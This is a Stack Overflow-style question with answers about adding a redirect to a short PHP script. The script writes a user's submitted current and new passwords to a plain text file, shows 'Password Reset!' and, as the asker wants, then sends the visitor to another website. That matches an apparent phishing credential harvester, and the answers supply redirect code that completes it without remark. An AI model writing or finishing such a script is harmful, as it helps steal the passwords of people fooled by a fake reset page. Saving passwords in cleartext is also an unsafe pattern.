# PHP to redirect to website

Tags: php, html

```
<?php

// Open the text file
$f = fopen("users.txt", "a");

// Write text
fwrite($f, $_POST["_current_password1_"]);
fwrite($f, $_POST["_new_password1_"]);

// Close the text file
fclose($f);


print "Password Reset!";


?>
```

How to have this redirect to a different website after it is done showing "Password Reset!"
( Not good at coding )

Comment: add `header('Location: http://www.example.com/');` before print

Answer (score 1, accepted):

To do the redirect after you have shown the message, you can use the refresh-header like this:

```
header("refresh:5; url=otherpage.php");
```

This will do the redirect after 5 seconds. You need to add that before the print command.

Answer (score 1):

try this:

```
header("Location: http://example.com/myOtherPage.php");
die();
```

Answer (score 1):

Use the header function `header('Location: url');`

Answer (score 1):

The [`header`](http://php.net/manual/fr/function.header.php) function can be helpful:

```
<?php
    header('Location: http://www.example.com/');
    exit; // End current script
?>
```

Answer (score 1):

You can use the following 2 ways to redirect to another page:

1- using PHP [header](http://php.net/manual/en/function.header.php) function:

```
header('Location: http://www.example.com/');
```

2- using JavaScript in PHP code:

```
echo '<script type="text/javascript">window.location = "http://www.example.com/";</script>';
```

Answer (score -1):

You can use [JavaScript](http://www.w3schools.com/js/) to redirect to another website:

```
echo "<script>window.location = 'www.google.com';</script>";
```

If you want to delay some seconds before redirection, you can use [setTimeout](http://www.w3schools.com/jsref/met_win_settimeout.asp) method:

```
echo "<script>setTimeout(function(){window.location = 'www.google.com';}, 3000);</script>";
```